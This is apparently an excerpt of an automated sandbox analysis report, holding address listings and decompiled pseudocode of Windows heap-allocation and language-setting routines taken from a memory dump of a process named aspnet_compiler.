                          0x0141a75d
                          0x0141a75e
                          0x0141a762
                          0x0141a767
                          0x01461faf
                          0x01461fb0
                          0x01461fb9
                          0x01461fbe
                          0x01461fc2
                          0x01461fc2
                          0x0141a76d
                          0x0141a76d
                          0x0141a775
                          0x0141a778
                          0x0141a77d
                          0x0141a77d
                          0x0141a71e
                          0x0141a782
                          0x0141a787
                          0x0141a789
                          0x01461ff3
                          0x0141a78f
                          0x0141a78f
                          0x0141a78f
                          0x0141a791
                          0x0141a794
                          0x01461ffd
                          0x01462006
                          0x0146200c
                          0x01462017
                          0x01462019
                          0x01462024
                          0x01462024
                          0x01462024
                          0x01462047
                          0x01462047
                          0x0146200c
                          0x0141a79a
                          0x0141a79f
                          0x0141a7a4
                          0x0141a7a9
                          0x0141a7ab
                          0x0146205a
                          0x0141a7b1
                          0x0141a7b1
                          0x0141a7b1
                          0x0141a7b3
                          0x0141a7b6
                          0x00000000
                          0x0141a7bc
                          0x01462066
                          0x01462068
                          0x01462073
                          0x01462073
                          0x01462073
                          0x01462078
                          0x01462079
                          0x0146207d
                          0x00000000
                          0x0146207d
                          0x0141a7b6
                          0x0141a440
                          0x0141a440
                          0x0141a440
                          0x0141a446
                          0x0141a44c
                          0x0141a44f
                          0x0141a453
                          0x0141a455
                          0x014620b3
                          0x014620b9
                          0x014620b9
                          0x0141a45d
                          0x0141a460
                          0x0141a464
                          0x0141a466
                          0x0141a46b
                          0x0141a46f
                          0x0141a471
                          0x0141a471
                          0x0141a471
                          0x0141a474
                          0x0141a479
                          0x0141a47d
                          0x0141a47f
                          0x01462229
                          0x0146222f
                          0x0141a3c8
                          0x0141a3c8
                          0x0141a3ca
                          0x0141a3ca
                          0x00000000
                          0x0141a3ca
                          0x01462235
                          0x0146223a
                          0x0146223a
                          0x00000000
                          0x00000000
                          0x01462240
                          0x01462246
                          0x0146224a
                          0x01462269
                          0x0146226e
                          0x0146224c
                          0x01462261
                          0x01462266
                          0x01462274
                          0x01462279
                          0x0146227e
                          0x01462286
                          0x01462288
                          0x0146228d
                          0x0146228d
                          0x01462292
                          0x01462292
                          0x01462295
                          0x01462295
                          0x00000000
                          0x01462295
                          0x0141a485
                          0x0141a489
                          0x0141a48b
                          0x0141a48f
                          0x0141a493
                          0x0141a497
                          0x0141a49b
                          0x0141a4bb
                          0x0141a4bb
                          0x0141a4bd
                          0x0141a4ff
                          0x0141a4ff
                          0x0141a501
                          0x0141a505
                          0x0141a50f
                          0x0141a517
                          0x0141a51b
                          0x0141a527
                          0x0141a52b
                          0x01462182
                          0x01462185
                          0x01462193
                          0x01462199
                          0x01462199
                          0x0141a531
                          0x0141a535
                          0x0141a538
                          0x0141a548
                          0x0141a54b
                          0x0141a54d
                          0x0141a553
                          0x0141a559
                          0x01462100
                          0x01462103
                          0x01462109
                          0x0146210f
                          0x01462112
                          0x01462131
                          0x01462136
                          0x01462114
                          0x01462129
                          0x0146212e
                          0x0146213c
                          0x01462141
                          0x01462147
                          0x0146214d
                          0x01462151
                          0x01462154
                          0x01462154
                          0x01462159
                          0x01462159
                          0x01462103
                          0x0141a55f
                          0x0141a562
                          0x0141a565
                          0x0141a567
                          0x01462162
                          0x0141a56d
                          0x0141a574
                          0x0141a575
                          0x0141a579
                          0x0141a57e
                          0x01462169
                          0x0146216a
                          0x01462170
                          0x01462175
                          0x01462179
                          0x01462179
                          0x0141a57e
                          0x0141a584
                          0x0141a58f
                          0x0141a58f
                          0x0141a52b
                          0x0141a5ad
                          0x0141a5bc
                          0x0141a5c1
                          0x0141a5c6
                          0x0141a5cb
                          0x0141a5cd
                          0x014621a9
                          0x0141a5d3
                          0x0141a5d3
                          0x0141a5d3
                          0x0141a5d5
                          0x0141a5d8
                          0x014621b3
                          0x014621bc
                          0x014621c2
                          0x014621cd
                          0x014621cf
                          0x014621da
                          0x014621da
                          0x014621da
                          0x014621f7
                          0x014621f7
                          0x014621c2
                          0x0141a5de
                          0x0141a5e3
                          0x0141a5e8
                          0x0141a5ea
                          0x0146220a
                          0x0141a5f0
                          0x0141a5f0
                          0x0141a5f0
                          0x0141a5f2
                          0x0141a5f5
                          0x01462219
                          0x0146221b
                          0x0146208c
                          0x0146208c
                          0x0146208c
                          0x01462095
                          0x01462096
                          0x01462097
                          0x01462098
                          0x014620a4
                          0x014620a5
                          0x014620a9
                          0x014620a9
                          0x00000000
                          0x0141a5f5
                          0x0141a4bf
                          0x0141a4d3
                          0x0141a4d8
                          0x0141a4da
                          0x01461ede
                          0x01461ede
                          0x01461ee4
                          0x01461ee9
                          0x00000000
                          0x00000000
                          0x01461f07
                          0x00000000
                          0x01461f07
                          0x0141a4e0
                          0x0141a4e5
                          0x0141a4e7
                          0x014620cb
                          0x0141a4ed
                          0x0141a4ed
                          0x0141a4ed
                          0x0141a4f2
                          0x0141a4f5
                          0x014620d5
                          0x014620de
                          0x014620e4
                          0x014620f6
                          0x014620f6
                          0x014620e4
                          0x0141a4fb
                          0x00000000
                          0x0141a4fb
                          0x0141a4a1
                          0x0141a4a4
                          0x0141a4a8
                          0x00000000
                          0x00000000
                          0x0141a4aa
                          0x0141a4ac
                          0x00000000
                          0x00000000
                          0x0141a4b2
                          0x0141a4b5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141a4b5
                          0x0141a43a
                          0x0141a340
                          0x0141a346
                          0x0141a600
                          0x00000000
                          0x0141a600
                          0x0141a34f
                          0x0141a351
                          0x0141a358
                          0x0141a3c6
                          0x00000000
                          0x0141a371
                          0x0141a37a
                          0x0141a37f
                          0x0141a382
                          0x0141a384
                          0x0141a394
                          0x00000000
                          0x0141a396
                          0x0141a399
                          0x0141a3a7
                          0x0141a3b0
                          0x0141a3b4
                          0x0141a3bb
                          0x0141a3d2
                          0x0141a3da
                          0x0141a3df
                          0x0141a3e1
                          0x0141a3e5
                          0x0141a3ea
                          0x0141a3f0
                          0x0141a3f0
                          0x0141a3e1
                          0x00000000
                          0x0141a3bb
                          0x0141a394

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-523794902
                          • Opcode ID: 67205b78db8c07a4027732e2a72c12b4bd0d2e249ee05af0499dc254d57813dd
                          • Instruction ID: 043f618a70a93e1d79643fb15831f01494aa27600eacb6748de010c774deeeb3
                          • Opcode Fuzzy Hash: 67205b78db8c07a4027732e2a72c12b4bd0d2e249ee05af0499dc254d57813dd
                          • Instruction Fuzzy Hash: 3A4232712093829FC715CF29C884B2BBBE5FF94608F14492EF5868B366D734D982CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E014B2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                          				signed int _t83;
                          				signed char _t89;
                          				intOrPtr _t90;
                          				signed char _t101;
                          				signed int _t102;
                          				intOrPtr _t104;
                          				signed int _t105;
                          				signed int _t106;
                          				intOrPtr _t108;
                          				intOrPtr _t112;
                          				short* _t130;
                          				short _t131;
                          				signed int _t148;
                          				intOrPtr _t149;
                          				signed int* _t154;
                          				short* _t165;
                          				signed int _t171;
                          				void* _t182;
                          
                          				_push(0x44);
                          				_push(0x14d0e80);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				_t177 = __edx;
                          				_t181 = __ecx;
                          				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                          				 *((char*)(_t182 - 0x1d)) = 0;
                          				 *(_t182 - 0x24) = 0;
                          				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                          					 *((intOrPtr*)(_t182 - 4)) = 0;
                          					 *((intOrPtr*)(_t182 - 4)) = 1;
                          					_t83 = E013F40E1("RtlAllocateHeap");
                          					__eflags = _t83;
                          					if(_t83 == 0) {
                          						L48:
                          						 *(_t182 - 0x24) = 0;
                          						L49:
                          						 *((intOrPtr*)(_t182 - 4)) = 0;
                          						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                          						E014B30C4();
                          						goto L50;
                          					}
                          					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                          					 *(_t182 - 0x28) = _t89;
                          					 *(_t182 - 0x3c) = _t89;
                          					_t177 =  *(_t182 + 8);
                          					__eflags = _t177;
                          					if(_t177 == 0) {
                          						_t171 = 1;
                          						__eflags = 1;
                          					} else {
                          						_t171 = _t177;
                          					}
                          					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                          					__eflags = _t148 - 0x10;
                          					if(_t148 < 0x10) {
                          						_t148 = 0x10;
                          					}
                          					_t149 = _t148 + 8;
                          					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                          					__eflags = _t149 - _t177;
                          					if(_t149 < _t177) {
                          						L44:
                          						_t90 =  *[fs:0x30];
                          						__eflags =  *(_t90 + 0xc);
                          						if( *(_t90 + 0xc) == 0) {
                          							_push("HEAP: ");
                          							E013FB150();
                          						} else {
                          							E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          						}
                          						_push( *((intOrPtr*)(_t181 + 0x78)));
                          						E013FB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                          						goto L48;
                          					} else {
                          						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                          						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                          							goto L44;
                          						}
                          						__eflags = _t89 & 0x00000001;
                          						if((_t89 & 0x00000001) != 0) {
                          							_t178 =  *(_t182 - 0x28);
                          						} else {
                          							E0140EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                          							 *((char*)(_t182 - 0x1d)) = 1;
                          							_t178 =  *(_t182 - 0x28) | 0x00000001;
                          							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                          						}
                          						E014B4496(_t181, 0);
                          						_t177 = L01414620(_t181, _t181, _t178,  *(_t182 + 8));
                          						 *(_t182 - 0x24) = _t177;
                          						_t173 = 1;
                          						E014B49A4(_t181);
                          						__eflags = _t177;
                          						if(_t177 == 0) {
                          							goto L49;
                          						} else {
                          							_t177 = _t177 + 0xfffffff8;
                          							__eflags =  *((char*)(_t177 + 7)) - 5;
                          							if( *((char*)(_t177 + 7)) == 5) {
                          								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                          								__eflags = _t177;
                          							}
                          							_t154 = _t177;
                          							 *(_t182 - 0x40) = _t177;
                          							__eflags =  *(_t181 + 0x4c);
                          							if( *(_t181 + 0x4c) != 0) {
                          								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                          								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                          								if(__eflags != 0) {
                          									_push(_t154);
                          									_t173 = _t177;
                          									E014AFA2B(0, _t181, _t177, _t177, _t181, __eflags);
                          								}
                          							}
                          							__eflags =  *(_t177 + 2) & 0x00000002;
                          							if(( *(_t177 + 2) & 0x00000002) == 0) {
                          								_t101 =  *(_t177 + 3);
                          								 *(_t182 - 0x29) = _t101;
                          								_t102 = _t101 & 0x000000ff;
                          							} else {
                          								_t130 = E013F1F5B(_t177);
                          								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                          								__eflags =  *(_t181 + 0x40) & 0x08000000;
                          								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                          									 *_t130 = 0;
                          								} else {
                          									_t131 = E014216C7(1, _t173);
                          									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                          									 *_t165 = _t131;
                          									_t130 = _t165;
                          								}
                          								_t102 =  *(_t130 + 2) & 0x0000ffff;
                          							}
                          							 *(_t182 - 0x34) = _t102;
                          							 *(_t182 - 0x28) = _t102;
                          							__eflags =  *(_t181 + 0x4c);
                          							if( *(_t181 + 0x4c) != 0) {
                          								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                          								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                          								__eflags =  *_t177;
                          							}
                          							__eflags =  *(_t181 + 0x40) & 0x20000000;
                          							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                          								__eflags = 0;
                          								E014B4496(_t181, 0);
                          							}
                          							__eflags =  *(_t182 - 0x24) -  *0x14e6360; // 0x0
                          							_t104 =  *[fs:0x30];
                          							if(__eflags != 0) {
                          								_t105 =  *(_t104 + 0x68);
                          								 *(_t182 - 0x4c) = _t105;
                          								__eflags = _t105 & 0x00000800;
                          								if((_t105 & 0x00000800) == 0) {
                          									goto L49;
                          								}
                          								_t106 =  *(_t182 - 0x34);
                          								__eflags = _t106;
                          								if(_t106 == 0) {
                          									goto L49;
                          								}
                          								__eflags = _t106 -  *0x14e6364; // 0x0
                          								if(__eflags != 0) {
                          									goto L49;
                          								}
                          								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x14e6366; // 0x0
                          								if(__eflags != 0) {
                          									goto L49;
                          								}
                          								_t108 =  *[fs:0x30];
                          								__eflags =  *(_t108 + 0xc);
                          								if( *(_t108 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_push(E0149D455(_t181,  *(_t182 - 0x28)));
                          								_push( *(_t182 + 8));
                          								E013FB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                          								goto L34;
                          							} else {
                          								__eflags =  *(_t104 + 0xc);
                          								if( *(_t104 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_push( *(_t182 + 8));
                          								E013FB150("Just allocated block at %p for %Ix bytes\n",  *0x14e6360);
                          								L34:
                          								_t112 =  *[fs:0x30];
                          								__eflags =  *((char*)(_t112 + 2));
                          								if( *((char*)(_t112 + 2)) != 0) {
                          									 *0x14e6378 = 1;
                          									 *0x14e60c0 = 0;
                          									asm("int3");
                          									 *0x14e6378 = 0;
                          								}
                          								goto L49;
                          							}
                          						}
                          					}
                          				} else {
                          					_t181 =  *0x14e5708; // 0x0
                          					 *0x14eb1e0(__ecx, __edx,  *(_t182 + 8));
                          					 *_t181();
                          					L50:
                          					return E0144D130(0, _t177, _t181);
                          				}
                          			}





















                          0x014b2d82
                          0x014b2d84
                          0x014b2d89
                          0x014b2d8e
                          0x014b2d90
                          0x014b2d92
                          0x014b2d97
                          0x014b2d9a
                          0x014b2da4
                          0x014b2dc0
                          0x014b2dc3
                          0x014b2dd1
                          0x014b2dd6
                          0x014b2dd8
                          0x014b30a7
                          0x014b30a7
                          0x014b30aa
                          0x014b30aa
                          0x014b30ad
                          0x014b30b4
                          0x00000000
                          0x014b30b9
                          0x014b2de3
                          0x014b2de8
                          0x014b2deb
                          0x014b2dee
                          0x014b2df1
                          0x014b2df3
                          0x014b2dfb
                          0x014b2dfb
                          0x014b2df5
                          0x014b2df5
                          0x014b2df5
                          0x014b2e04
                          0x014b2e0a
                          0x014b2e0d
                          0x014b2e11
                          0x014b2e11
                          0x014b2e12
                          0x014b2e15
                          0x014b2e18
                          0x014b2e1a
                          0x014b3027
                          0x014b3027
                          0x014b302d
                          0x014b3030
                          0x014b304f
                          0x014b3054
                          0x014b3032
                          0x014b3047
                          0x014b304c
                          0x014b305a
                          0x014b3063
                          0x00000000
                          0x014b2e20
                          0x014b2e20
                          0x014b2e23
                          0x00000000
                          0x00000000
                          0x014b2e29
                          0x014b2e2b
                          0x014b2e47
                          0x014b2e2d
                          0x014b2e33
                          0x014b2e38
                          0x014b2e3f
                          0x014b2e42
                          0x014b2e42
                          0x014b2e4e
                          0x014b2e5d
                          0x014b2e5f
                          0x014b2e62
                          0x014b2e66
                          0x014b2e6b
                          0x014b2e6d
                          0x00000000
                          0x014b2e73
                          0x014b2e73
                          0x014b2e76
                          0x014b2e7a
                          0x014b2e83
                          0x014b2e83
                          0x014b2e83
                          0x014b2e85
                          0x014b2e87
                          0x014b2e8a
                          0x014b2e8d
                          0x014b2e92
                          0x014b2e9c
                          0x014b2e9f
                          0x014b2ea1
                          0x014b2ea2
                          0x014b2ea6
                          0x014b2ea6
                          0x014b2e9f
                          0x014b2eab
                          0x014b2eaf
                          0x014b2edf
                          0x014b2ee2
                          0x014b2ee5
                          0x014b2eb1
                          0x014b2eb3
                          0x014b2eb8
                          0x014b2ebd
                          0x014b2ec4
                          0x014b2ed6
                          0x014b2ec6
                          0x014b2ec7
                          0x014b2ecc
                          0x014b2ecf
                          0x014b2ed2
                          0x014b2ed2
                          0x014b2ed9
                          0x014b2ed9
                          0x014b2ee8
                          0x014b2eeb
                          0x014b2eef
                          0x014b2ef2
                          0x014b2efe
                          0x014b2f04
                          0x014b2f04
                          0x014b2f04
                          0x014b2f06
                          0x014b2f0d
                          0x014b2f0f
                          0x014b2f13
                          0x014b2f13
                          0x014b2f1b
                          0x014b2f21
                          0x014b2f27
                          0x014b2f95
                          0x014b2f98
                          0x014b2f9b
                          0x014b2fa0
                          0x00000000
                          0x00000000
                          0x014b2fa6
                          0x014b2fa9
                          0x014b2fac
                          0x00000000
                          0x00000000
                          0x014b2fb2
                          0x014b2fb9
                          0x00000000
                          0x00000000
                          0x014b2fc3
                          0x014b2fca
                          0x00000000
                          0x00000000
                          0x014b2fd0
                          0x014b2fd6
                          0x014b2fd9
                          0x014b2ff8
                          0x014b2ffd
                          0x014b2fdb
                          0x014b2ff0
                          0x014b2ff5
                          0x014b300e
                          0x014b300f
                          0x014b301a
                          0x00000000
                          0x014b2f29
                          0x014b2f29
                          0x014b2f2c
                          0x014b2f4b
                          0x014b2f50
                          0x014b2f2e
                          0x014b2f43
                          0x014b2f48
                          0x014b2f56
                          0x014b2f64
                          0x014b2f6c
                          0x014b2f6c
                          0x014b2f72
                          0x014b2f76
                          0x014b2f7c
                          0x014b2f83
                          0x014b2f89
                          0x014b2f8a
                          0x014b2f8a
                          0x00000000
                          0x014b2f76
                          0x014b2f27
                          0x014b2e6d
                          0x014b2da6
                          0x014b2dab
                          0x014b2db3
                          0x014b2db9
                          0x014b30bc
                          0x014b30c1
                          0x014b30c1

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                          • API String ID: 0-1745908468
                          • Opcode ID: 2c908b7717c0102aeb3b8ae7842fa7bdf4309c151ff30cb14d29b25a844e5ae8
                          • Instruction ID: a05f12eb6c723e7e8699e0b2d00a3933e6e6d9c6cc08a2692a0e349d72f8e33a
                          • Opcode Fuzzy Hash: 2c908b7717c0102aeb3b8ae7842fa7bdf4309c151ff30cb14d29b25a844e5ae8
                          • Instruction Fuzzy Hash: 31911271500641DFDB22DFAEC494AEEBBF2FF59614F18801EE5455B3A2C772A942CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E01403D34(signed int* __ecx) {
                          				signed int* _v8;
                          				char _v12;
                          				signed int* _v16;
                          				signed int* _v20;
                          				char _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				char _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int* _v48;
                          				signed int* _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				char _v68;
                          				signed int _t140;
                          				signed int _t161;
                          				signed int* _t236;
                          				signed int* _t242;
                          				signed int* _t243;
                          				signed int* _t244;
                          				signed int* _t245;
                          				signed int _t255;
                          				void* _t257;
                          				signed int _t260;
                          				void* _t262;
                          				signed int _t264;
                          				void* _t267;
                          				signed int _t275;
                          				signed int* _t276;
                          				short* _t277;
                          				signed int* _t278;
                          				signed int* _t279;
                          				signed int* _t280;
                          				short* _t281;
                          				signed int* _t282;
                          				short* _t283;
                          				signed int* _t284;
                          				void* _t285;
                          
                          				_v60 = _v60 | 0xffffffff;
                          				_t280 = 0;
                          				_t242 = __ecx;
                          				_v52 = __ecx;
                          				_v8 = 0;
                          				_v20 = 0;
                          				_v40 = 0;
                          				_v28 = 0;
                          				_v32 = 0;
                          				_v44 = 0;
                          				_v56 = 0;
                          				_t275 = 0;
                          				_v16 = 0;
                          				if(__ecx == 0) {
                          					_t280 = 0xc000000d;
                          					_t140 = 0;
                          					L50:
                          					 *_t242 =  *_t242 | 0x00000800;
                          					_t242[0x13] = _t140;
                          					_t242[0x16] = _v40;
                          					_t242[0x18] = _v28;
                          					_t242[0x14] = _v32;
                          					_t242[0x17] = _t275;
                          					_t242[0x15] = _v44;
                          					_t242[0x11] = _v56;
                          					_t242[0x12] = _v60;
                          					return _t280;
                          				}
                          				if(E01401B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                          					_v56 = 1;
                          					if(_v8 != 0) {
                          						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                          					}
                          					_v8 = _t280;
                          				}
                          				if(E01401B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                          					_v60 =  *_v8;
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                          					_v8 = _t280;
                          				}
                          				if(E01401B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                          					L16:
                          					if(E01401B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                          						L28:
                          						if(E01401B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                          							L46:
                          							_t275 = _v16;
                          							L47:
                          							_t161 = 0;
                          							L48:
                          							if(_v8 != 0) {
                          								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                          							}
                          							_t140 = _v20;
                          							if(_t140 != 0) {
                          								if(_t275 != 0) {
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                          									_t275 = 0;
                          									_v28 = 0;
                          									_t140 = _v20;
                          								}
                          							}
                          							goto L50;
                          						}
                          						_t167 = _v12;
                          						_t255 = _v12 + 4;
                          						_v44 = _t255;
                          						if(_t255 == 0) {
                          							_t276 = _t280;
                          							_v32 = _t280;
                          						} else {
                          							_t276 = L01414620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                          							_t167 = _v12;
                          							_v32 = _t276;
                          						}
                          						if(_t276 == 0) {
                          							_v44 = _t280;
                          							_t280 = 0xc0000017;
                          							goto L46;
                          						} else {
                          							E0143F3E0(_t276, _v8, _t167);
                          							_v48 = _t276;
                          							_t277 = E01441370(_t276, 0x13d4e90);
                          							_pop(_t257);
                          							if(_t277 == 0) {
                          								L38:
                          								_t170 = _v48;
                          								if( *_v48 != 0) {
                          									E0143BB40(0,  &_v68, _t170);
                          									if(L014043C0( &_v68,  &_v24) != 0) {
                          										_t280 =  &(_t280[0]);
                          									}
                          								}
                          								if(_t280 == 0) {
                          									_t280 = 0;
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                          									_v44 = 0;
                          									_v32 = 0;
                          								} else {
                          									_t280 = 0;
                          								}
                          								_t174 = _v8;
                          								if(_v8 != 0) {
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                          								}
                          								_v8 = _t280;
                          								goto L46;
                          							}
                          							_t243 = _v48;
                          							do {
                          								 *_t277 = 0;
                          								_t278 = _t277 + 2;
                          								E0143BB40(_t257,  &_v68, _t243);
                          								if(L014043C0( &_v68,  &_v24) != 0) {
                          									_t280 =  &(_t280[0]);
                          								}
                          								_t243 = _t278;
                          								_t277 = E01441370(_t278, 0x13d4e90);
                          								_pop(_t257);
                          							} while (_t277 != 0);
                          							_v48 = _t243;
                          							_t242 = _v52;
                          							goto L38;
                          						}
                          					}
                          					_t191 = _v12;
                          					_t260 = _v12 + 4;
                          					_v28 = _t260;
                          					if(_t260 == 0) {
                          						_t275 = _t280;
                          						_v16 = _t280;
                          					} else {
                          						_t275 = L01414620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                          						_t191 = _v12;
                          						_v16 = _t275;
                          					}
                          					if(_t275 == 0) {
                          						_v28 = _t280;
                          						_t280 = 0xc0000017;
                          						goto L47;
                          					} else {
                          						E0143F3E0(_t275, _v8, _t191);
                          						_t285 = _t285 + 0xc;
                          						_v48 = _t275;
                          						_t279 = _t280;
                          						_t281 = E01441370(_v16, 0x13d4e90);
                          						_pop(_t262);
                          						if(_t281 != 0) {
                          							_t244 = _v48;
                          							do {
                          								 *_t281 = 0;
                          								_t282 = _t281 + 2;
                          								E0143BB40(_t262,  &_v68, _t244);
                          								if(L014043C0( &_v68,  &_v24) != 0) {
                          									_t279 =  &(_t279[0]);
                          								}
                          								_t244 = _t282;
                          								_t281 = E01441370(_t282, 0x13d4e90);
                          								_pop(_t262);
                          							} while (_t281 != 0);
                          							_v48 = _t244;
                          							_t242 = _v52;
                          						}
                          						_t201 = _v48;
                          						_t280 = 0;
                          						if( *_v48 != 0) {
                          							E0143BB40(_t262,  &_v68, _t201);
                          							if(L014043C0( &_v68,  &_v24) != 0) {
                          								_t279 =  &(_t279[0]);
                          							}
                          						}
                          						if(_t279 == 0) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                          							_v28 = _t280;
                          							_v16 = _t280;
                          						}
                          						_t202 = _v8;
                          						if(_v8 != 0) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                          						}
                          						_v8 = _t280;
                          						goto L28;
                          					}
                          				}
                          				_t214 = _v12;
                          				_t264 = _v12 + 4;
                          				_v40 = _t264;
                          				if(_t264 == 0) {
                          					_v20 = _t280;
                          				} else {
                          					_t236 = L01414620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                          					_t280 = _t236;
                          					_v20 = _t236;
                          					_t214 = _v12;
                          				}
                          				if(_t280 == 0) {
                          					_t161 = 0;
                          					_t280 = 0xc0000017;
                          					_v40 = 0;
                          					goto L48;
                          				} else {
                          					E0143F3E0(_t280, _v8, _t214);
                          					_t285 = _t285 + 0xc;
                          					_v48 = _t280;
                          					_t283 = E01441370(_t280, 0x13d4e90);
                          					_pop(_t267);
                          					if(_t283 != 0) {
                          						_t245 = _v48;
                          						do {
                          							 *_t283 = 0;
                          							_t284 = _t283 + 2;
                          							E0143BB40(_t267,  &_v68, _t245);
                          							if(L014043C0( &_v68,  &_v24) != 0) {
                          								_t275 = _t275 + 1;
                          							}
                          							_t245 = _t284;
                          							_t283 = E01441370(_t284, 0x13d4e90);
                          							_pop(_t267);
                          						} while (_t283 != 0);
                          						_v48 = _t245;
                          						_t242 = _v52;
                          					}
                          					_t224 = _v48;
                          					_t280 = 0;
                          					if( *_v48 != 0) {
                          						E0143BB40(_t267,  &_v68, _t224);
                          						if(L014043C0( &_v68,  &_v24) != 0) {
                          							_t275 = _t275 + 1;
                          						}
                          					}
                          					if(_t275 == 0) {
                          						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                          						_v40 = _t280;
                          						_v20 = _t280;
                          					}
                          					_t225 = _v8;
                          					if(_v8 != 0) {
                          						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                          					}
                          					_v8 = _t280;
                          					goto L16;
                          				}
                          			}










































                          0x01403d3c
                          0x01403d42
                          0x01403d44
                          0x01403d46
                          0x01403d49
                          0x01403d4c
                          0x01403d4f
                          0x01403d52
                          0x01403d55
                          0x01403d58
                          0x01403d5b
                          0x01403d5f
                          0x01403d61
                          0x01403d66
                          0x01458213
                          0x01458218
                          0x01404085
                          0x01404088
                          0x0140408e
                          0x01404094
                          0x0140409a
                          0x014040a0
                          0x014040a6
                          0x014040a9
                          0x014040af
                          0x014040b6
                          0x014040bd
                          0x014040bd
                          0x01403d83
                          0x0145821f
                          0x01458229
                          0x01458238
                          0x01458238
                          0x0145823d
                          0x0145823d
                          0x01403da0
                          0x01403daf
                          0x01403db5
                          0x01403dba
                          0x01403dba
                          0x01403dd4
                          0x01403e94
                          0x01403eab
                          0x01403f6d
                          0x01403f84
                          0x0140406b
                          0x0140406b
                          0x0140406e
                          0x0140406e
                          0x01404070
                          0x01404074
                          0x01458351
                          0x01458351
                          0x0140407a
                          0x0140407f
                          0x0145835d
                          0x01458370
                          0x01458377
                          0x01458379
                          0x0145837c
                          0x0145837c
                          0x0145835d
                          0x00000000
                          0x0140407f
                          0x01403f8a
                          0x01403f8d
                          0x01403f90
                          0x01403f95
                          0x0145830d
                          0x0145830f
                          0x01403f9b
                          0x01403fac
                          0x01403fae
                          0x01403fb1
                          0x01403fb1
                          0x01403fb6
                          0x01458317
                          0x0145831a
